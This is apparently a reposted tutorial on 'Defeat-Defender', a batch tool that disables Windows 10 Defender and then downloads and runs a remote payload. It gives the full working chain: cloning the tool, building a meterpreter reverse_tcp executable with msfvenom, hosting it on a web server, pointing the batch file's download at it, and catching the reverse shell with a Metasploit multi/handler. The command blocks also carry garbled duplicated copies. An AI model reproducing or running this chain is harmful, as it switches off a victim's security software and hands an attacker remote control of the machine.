amrica
Search Guru
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
data:image/s3,"s3://crabby-images/58e9b/58e9b98f431a17377b77a4d2e68da20e62cf5290" alt="Dark-Green-and-White-Hat-Fashion-Collection-YouTube-Thumbnail.png"
Hey Folks, in this tutorial we are going to talk about an open source tool called “Defeat-Defender“, which is coded in batch language and designed to defeat the security defender of windows operating system and to get access to the system. Keep in mind that it is capable of bypassing windows 10 operating system defender easily, even you can try it yourself.
Let’s take a look
data:image/s3,"s3://crabby-images/e8e8f/e8e8f10ee7969490cfdc1dc1612ff37bbd0ae6f5" alt="Face with tongue :stuck_out_tongue: 😛"
Methodology of Defeat-Defender
Originally the developer of this tool used only simple logics to defeat Windows 10 Defender. As we know that windows allows us to donwload any batch file from external network and by taking advantage of this feature, it first dismantles all security and defenders using the administrative command prompt of window and once done, it downloads the payload from the target web server and executes it without any restrictions.
Installation
Now we download this tool from gihtub using git command and go inside the directory of this tool.
git clone https://github.com/swagkarna/Defeat-Defender.git
cd Defeat-Defender12git clone
https://github.com/swagkarna/Defeat-Defender.gitcd Defeat-Defender
data:image/s3,"s3://crabby-images/e0b49/e0b49c2a6b1c6937c7af9594026191e4b179571a" alt="1-1.png"
Create Payload
Once inside the directory of this device, we will create a payload and move the payload to the root directory of the apache web server so that it can be hosted.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.13 lport=4444 -f exe > window.exe
cp window.exe /var/www/html/
systemctl start apache2123msfvenom-pwindows/meterpreter/reverse_tcp lhost=192.168.1.13lport=4444-fexe>window.execp window.exe/var/www/html/systemctl start apache2
data:image/s3,"s3://crabby-images/2dde4/2dde431a01ac562eae4cc44eba4e3ddc85d18eb3" alt="2-2.png"
Now we need to edit the “Defeat-Defender.bat” file. So open it using nano command, go to the bottom and you will see as shown in the image below.
nano Defeat-Defender.bat1nano Defeat-Defender.bat
data:image/s3,"s3://crabby-images/45de9/45de9c021e5acf81097f192b717bc9b1c7d0bdc2" alt="3-2.png"
Now we need to remove the highlighted and give the location of our own apache web server along with payload name. Keep in mind that rename “payload. exe” everywhere to “window.exe“.
data:image/s3,"s3://crabby-images/cd2e4/cd2e4007ab0b3d6f112f8f3ee23b1b1756237663" alt="4-2.png"
Alright
data:image/s3,"s3://crabby-images/e8e8f/e8e8f10ee7969490cfdc1dc1612ff37bbd0ae6f5" alt="Face with tongue :stuck_out_tongue: 😛"
python -m SimpleHTTPServer1python-mSimpleHTTPServer
data:image/s3,"s3://crabby-images/0368a/0368af137a07c1b0d3328a8ccbf1b66540082485" alt="5-2.png"
PoC ( Proof )
As you can see the window defender is already active in the victim machine.
data:image/s3,"s3://crabby-images/d90f3/d90f351123973733c8e01a7dbf9297736f192b7d" alt="6-3.png"
Great
data:image/s3,"s3://crabby-images/e8e8f/e8e8f10ee7969490cfdc1dc1612ff37bbd0ae6f5" alt="Face with tongue :stuck_out_tongue: 😛"
data:image/s3,"s3://crabby-images/bcfbc/bcfbc0452ad6ffed77b51aff37b23dad18c00923" alt="7-4.png"
Hmm
data:image/s3,"s3://crabby-images/e8e8f/e8e8f10ee7969490cfdc1dc1612ff37bbd0ae6f5" alt="Face with tongue :stuck_out_tongue: 😛"
data:image/s3,"s3://crabby-images/1fb31/1fb312cca11f0399601fd34ac439dd034af29439" alt="8-3.png"
Once the victim has allowed the application to be configured, then a message will popping up on the screen as shown in the image below.
data:image/s3,"s3://crabby-images/7ea70/7ea70ebee615be61d2c42d3ae0684643ce282ad3" alt="9-3.png"
Amazing
data:image/s3,"s3://crabby-images/e8e8f/e8e8f10ee7969490cfdc1dc1612ff37bbd0ae6f5" alt="Face with tongue :stuck_out_tongue: 😛"
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.13
set lport 4444
run123456msfconsoleuseexploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost192.168.1.13set lport4444run
data:image/s3,"s3://crabby-images/a7888/a78880a2f26a3cc1ab691ad49bc317dfd6c457e4" alt="meter.png"
As you have seen how easily it has defeated the defender of Windows 10 machine.
About the AuthorShubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.